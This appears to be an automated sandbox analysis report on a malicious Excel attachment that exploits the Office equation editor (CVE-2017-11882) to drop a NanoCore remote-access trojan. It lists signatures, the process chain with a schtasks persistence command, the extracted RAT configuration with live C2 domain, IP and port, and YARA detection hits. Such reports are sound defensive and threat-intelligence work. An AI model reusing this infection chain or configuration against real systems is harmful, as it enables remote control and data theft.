Play interactive tour

Edit tour

Windows Analysis Report Import order764536.xlsx

Overview

General Information

Sample Name:	Import order764536.xlsx
Analysis ID:	501830
MD5:	cf9700bcf6687a0f9bc3b205b43b40ba
SHA1:	1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256:	61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: NanoCore

Yara detected AntiVM3

Detected Nanocore Rat

Yara detected AntiVM autoit script

Yara detected Nanocore RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Drops PE files with a suspicious file extension

Writes to foreign memory regions

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Contains functionality to launch a process as a different user

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

Dropped file seen in connection with other malware

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to execute programs as a different user

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Potential document exploit detected (performs HTTP gets)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1240 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2804 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2860 cmdline: 'C:\Users\Public\vbc.exe' MD5: B866823E1F8F4A52376BD108C457DD78)

mmuiqlcvwo.pif (PID: 2516 cmdline: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp MD5: 8E699954F6B5D64683412CC560938507)

RegSvcs.exe (PID: 2780 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)

schtasks.exe (PID: 1724 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2936 cmdline: taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

RegSvcs.exe (PID: 632 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 62CE5EF995FD63A1847A196C2E8B267B)

mmuiqlcvwo.pif (PID: 2568 cmdline: 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp MD5: 8E699954F6B5D64683412CC560938507)

RegSvcs.exe (PID: 684 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10da5:$x1: NanoCore.ClientPluginHost 0x10de2:$x2: IClientNetworkHost 0x14915:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10b0d:$a: NanoCore 0x10b1d:$a: NanoCore 0x10d51:$a: NanoCore 0x10d65:$a: NanoCore 0x10da5:$a: NanoCore 0x10b6c:$b: ClientPlugin 0x10d6e:$b: ClientPlugin 0x10dae:$b: ClientPlugin 0x10c93:$c: ProjectData 0x1169a:$d: DESCrypto 0x19066:$e: KeepAlive 0x17054:$g: LogClientMessage 0x1324f:$i: get_Connected 0x119d0:$j: #=q 0x11a00:$j: #=q 0x11a1c:$j: #=q 0x11a4c:$j: #=q 0x11a68:$j: #=q 0x11a84:$j: #=q 0x11ab4:$j: #=q 0x11ad0:$j: #=q
0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4324d:$a: NanoCore 0x432a6:$a: NanoCore 0x432e3:$a: NanoCore 0x4335c:$a: NanoCore 0x56a07:$a: NanoCore 0x56a1c:$a: NanoCore 0x56a51:$a: NanoCore 0x602b9:$a: NanoCore 0x6fa7b:$a: NanoCore 0x6fa90:$a: NanoCore 0x6fac5:$a: NanoCore 0x432af:$b: ClientPlugin 0x432ec:$b: ClientPlugin 0x43bea:$b: ClientPlugin 0x43bf7:$b: ClientPlugin 0x567c3:$b: ClientPlugin 0x567de:$b: ClientPlugin 0x5680e:$b: ClientPlugin 0x56a25:$b: ClientPlugin 0x56a5a:$b: ClientPlugin 0x6f837:$b: ClientPlugin
0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10195:$x1: NanoCore.ClientPluginHost 0x101d2:$x2: IClientNetworkHost 0x13d05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfefd:$a: NanoCore 0xff0d:$a: NanoCore 0x10141:$a: NanoCore 0x10155:$a: NanoCore 0x10195:$a: NanoCore 0xff5c:$b: ClientPlugin 0x1015e:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x10083:$c: ProjectData 0x10a8a:$d: DESCrypto 0x18456:$e: KeepAlive 0x16444:$g: LogClientMessage 0x1263f:$i: get_Connected 0x10dc0:$j: #=q 0x10df0:$j: #=q 0x10e0c:$j: #=q 0x10e3c:$j: #=q 0x10e58:$j: #=q 0x10e74:$j: #=q 0x10ea4:$j: #=q 0x10ec0:$j: #=q
00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xffad:$x1: NanoCore.ClientPluginHost 0xffea:$x2: IClientNetworkHost 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd15:$a: NanoCore 0xfd25:$a: NanoCore 0xff59:$a: NanoCore 0xff6d:$a: NanoCore 0xffad:$a: NanoCore 0xfd74:$b: ClientPlugin 0xff76:$b: ClientPlugin 0xffb6:$b: ClientPlugin 0xfe9b:$c: ProjectData 0x108a2:$d: DESCrypto 0x1826e:$e: KeepAlive 0x1625c:$g: LogClientMessage 0x12457:$i: get_Connected 0x10bd8:$j: #=q 0x10c08:$j: #=q 0x10c24:$j: #=q 0x10c54:$j: #=q 0x10c70:$j: #=q 0x10c8c:$j: #=q 0x10cbc:$j: #=q 0x10cd8:$j: #=q
00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfbad:$x1: NanoCore.ClientPluginHost 0xfbea:$x2: IClientNetworkHost 0x1371d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf915:$a: NanoCore 0xf925:$a: NanoCore 0xfb59:$a: NanoCore 0xfb6d:$a: NanoCore 0xfbad:$a: NanoCore 0xf974:$b: ClientPlugin 0xfb76:$b: ClientPlugin 0xfbb6:$b: ClientPlugin 0xfa9b:$c: ProjectData 0x104a2:$d: DESCrypto 0x17e6e:$e: KeepAlive 0x15e5c:$g: LogClientMessage 0x12057:$i: get_Connected 0x107d8:$j: #=q 0x10808:$j: #=q 0x10824:$j: #=q 0x10854:$j: #=q 0x10870:$j: #=q 0x1088c:$j: #=q 0x108bc:$j: #=q 0x108d8:$j: #=q
00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x29b5:$x1: NanoCore.ClientPluginHost 0x29f2:$x2: IClientNetworkHost 0x6525:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x271d:$a: NanoCore 0x272d:$a: NanoCore 0x2961:$a: NanoCore 0x2975:$a: NanoCore 0x29b5:$a: NanoCore 0x277c:$b: ClientPlugin 0x297e:$b: ClientPlugin 0x29be:$b: ClientPlugin 0x28a3:$c: ProjectData 0x32aa:$d: DESCrypto 0xac76:$e: KeepAlive 0x8c64:$g: LogClientMessage 0x4e5f:$i: get_Connected 0x35e0:$j: #=q 0x3610:$j: #=q 0x362c:$j: #=q 0x365c:$j: #=q 0x3678:$j: #=q 0x3694:$j: #=q 0x36c4:$j: #=q 0x36e0:$j: #=q
00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf1d5:$x1: NanoCore.ClientPluginHost 0x423cd:$x1: NanoCore.ClientPluginHost 0xf212:$x2: IClientNetworkHost 0x4240a:$x2: IClientNetworkHost 0x12d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x45f3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xef3d:$a: NanoCore 0xef4d:$a: NanoCore 0xf181:$a: NanoCore 0xf195:$a: NanoCore 0xf1d5:$a: NanoCore 0x42135:$a: NanoCore 0x42145:$a: NanoCore 0x42379:$a: NanoCore 0x4238d:$a: NanoCore 0x423cd:$a: NanoCore 0xef9c:$b: ClientPlugin 0xf19e:$b: ClientPlugin 0xf1de:$b: ClientPlugin 0x42194:$b: ClientPlugin 0x42396:$b: ClientPlugin 0x423d6:$b: ClientPlugin 0xf0c3:$c: ProjectData 0x422bb:$c: ProjectData 0xfaca:$d: DESCrypto 0x42cc2:$d: DESCrypto 0x17496:$e: KeepAlive
0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1614d:$x1: NanoCore.ClientPluginHost 0x1618a:$x2: IClientNetworkHost 0x19cbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x15eb5:$a: NanoCore 0x15ec5:$a: NanoCore 0x160f9:$a: NanoCore 0x1610d:$a: NanoCore 0x1614d:$a: NanoCore 0x15f14:$b: ClientPlugin 0x16116:$b: ClientPlugin 0x16156:$b: ClientPlugin 0x1603b:$c: ProjectData 0x16a42:$d: DESCrypto 0x1c6e:$e: KeepAlive 0x1e40e:$e: KeepAlive 0x1c3fc:$g: LogClientMessage 0x185f7:$i: get_Connected 0x5:$j: #=q 0x35:$j: #=q 0x65:$j: #=q 0x95:$j: #=q 0xc5:$j: #=q 0xf5:$j: #=q 0x125:$j: #=q
0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff9d:$x1: NanoCore.ClientPluginHost 0xffda:$x2: IClientNetworkHost 0x13b0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd05:$a: NanoCore 0xfd15:$a: NanoCore 0xff49:$a: NanoCore 0xff5d:$a: NanoCore 0xff9d:$a: NanoCore 0xfd64:$b: ClientPlugin 0xff66:$b: ClientPlugin 0xffa6:$b: ClientPlugin 0xfe8b:$c: ProjectData 0x10892:$d: DESCrypto 0x1825e:$e: KeepAlive 0x1624c:$g: LogClientMessage 0x12447:$i: get_Connected 0x10bc8:$j: #=q 0x10bf8:$j: #=q 0x10c14:$j: #=q 0x10c44:$j: #=q 0x10c60:$j: #=q 0x10c7c:$j: #=q 0x10cac:$j: #=q 0x10cc8:$j: #=q
0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x29b5:$x1: NanoCore.ClientPluginHost 0x29f2:$x2: IClientNetworkHost 0x6525:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x271d:$a: NanoCore 0x272d:$a: NanoCore 0x2961:$a: NanoCore 0x2975:$a: NanoCore 0x29b5:$a: NanoCore 0x277c:$b: ClientPlugin 0x297e:$b: ClientPlugin 0x29be:$b: ClientPlugin 0x28a3:$c: ProjectData 0x32aa:$d: DESCrypto 0xac76:$e: KeepAlive 0x8c64:$g: LogClientMessage 0x4e5f:$i: get_Connected 0x35e0:$j: #=q 0x3610:$j: #=q 0x362c:$j: #=q 0x365c:$j: #=q 0x3678:$j: #=q 0x3694:$j: #=q 0x36c4:$j: #=q 0x36e0:$j: #=q
00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff9d:$x1: NanoCore.ClientPluginHost 0xffda:$x2: IClientNetworkHost 0x13b0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd05:$a: NanoCore 0xfd15:$a: NanoCore 0xff49:$a: NanoCore 0xff5d:$a: NanoCore 0xff9d:$a: NanoCore 0xfd64:$b: ClientPlugin 0xff66:$b: ClientPlugin 0xffa6:$b: ClientPlugin 0xfe8b:$c: ProjectData 0x10892:$d: DESCrypto 0x1825e:$e: KeepAlive 0x1624c:$g: LogClientMessage 0x12447:$i: get_Connected 0x10bc8:$j: #=q 0x10bf8:$j: #=q 0x10c14:$j: #=q 0x10c44:$j: #=q 0x10c60:$j: #=q 0x10c7c:$j: #=q 0x10cac:$j: #=q 0x10cc8:$j: #=q
00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101d5:$x1: NanoCore.ClientPluginHost 0x42fdd:$x1: NanoCore.ClientPluginHost 0x10212:$x2: IClientNetworkHost 0x4301a:$x2: IClientNetworkHost 0x13d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff3d:$a: NanoCore 0xff4d:$a: NanoCore 0x10181:$a: NanoCore 0x10195:$a: NanoCore 0x101d5:$a: NanoCore 0x42d45:$a: NanoCore 0x42d55:$a: NanoCore 0x42f89:$a: NanoCore 0x42f9d:$a: NanoCore 0x42fdd:$a: NanoCore 0xff9c:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x101de:$b: ClientPlugin 0x42da4:$b: ClientPlugin 0x42fa6:$b: ClientPlugin 0x42fe6:$b: ClientPlugin 0x100c3:$c: ProjectData 0x42ecb:$c: ProjectData 0x10aca:$d: DESCrypto 0x438d2:$d: DESCrypto 0x18496:$e: KeepAlive
0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff9d:$x1: NanoCore.ClientPluginHost 0x42da5:$x1: NanoCore.ClientPluginHost 0xffda:$x2: IClientNetworkHost 0x42de2:$x2: IClientNetworkHost 0x13b0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46915:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd05:$a: NanoCore 0xfd15:$a: NanoCore 0xff49:$a: NanoCore 0xff5d:$a: NanoCore 0xff9d:$a: NanoCore 0x42b0d:$a: NanoCore 0x42b1d:$a: NanoCore 0x42d51:$a: NanoCore 0x42d65:$a: NanoCore 0x42da5:$a: NanoCore 0xfd64:$b: ClientPlugin 0xff66:$b: ClientPlugin 0xffa6:$b: ClientPlugin 0x42b6c:$b: ClientPlugin 0x42d6e:$b: ClientPlugin 0x42dae:$b: ClientPlugin 0xfe8b:$c: ProjectData 0x42c93:$c: ProjectData 0x10892:$d: DESCrypto 0x4369a:$d: DESCrypto 0x1825e:$e: KeepAlive
0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101d5:$x1: NanoCore.ClientPluginHost 0x42fdd:$x1: NanoCore.ClientPluginHost 0x10212:$x2: IClientNetworkHost 0x4301a:$x2: IClientNetworkHost 0x13d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff3d:$a: NanoCore 0xff4d:$a: NanoCore 0x10181:$a: NanoCore 0x10195:$a: NanoCore 0x101d5:$a: NanoCore 0x42d45:$a: NanoCore 0x42d55:$a: NanoCore 0x42f89:$a: NanoCore 0x42f9d:$a: NanoCore 0x42fdd:$a: NanoCore 0xff9c:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x101de:$b: ClientPlugin 0x42da4:$b: ClientPlugin 0x42fa6:$b: ClientPlugin 0x42fe6:$b: ClientPlugin 0x100c3:$c: ProjectData 0x42ecb:$c: ProjectData 0x10aca:$d: DESCrypto 0x438d2:$d: DESCrypto 0x18496:$e: KeepAlive
00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x324d:$a: NanoCore 0x32a6:$a: NanoCore 0x32e3:$a: NanoCore 0x335c:$a: NanoCore 0x16a07:$a: NanoCore 0x16a1c:$a: NanoCore 0x16a51:$a: NanoCore 0x202b9:$a: NanoCore 0x2fa7b:$a: NanoCore 0x2fa90:$a: NanoCore 0x2fac5:$a: NanoCore 0x32af:$b: ClientPlugin 0x32ec:$b: ClientPlugin 0x3bea:$b: ClientPlugin 0x3bf7:$b: ClientPlugin 0x167c3:$b: ClientPlugin 0x167de:$b: ClientPlugin 0x1680e:$b: ClientPlugin 0x16a25:$b: ClientPlugin 0x16a5a:$b: ClientPlugin 0x2f837:$b: ClientPlugin
0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10da5:$x1: NanoCore.ClientPluginHost 0x10de2:$x2: IClientNetworkHost 0x14915:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
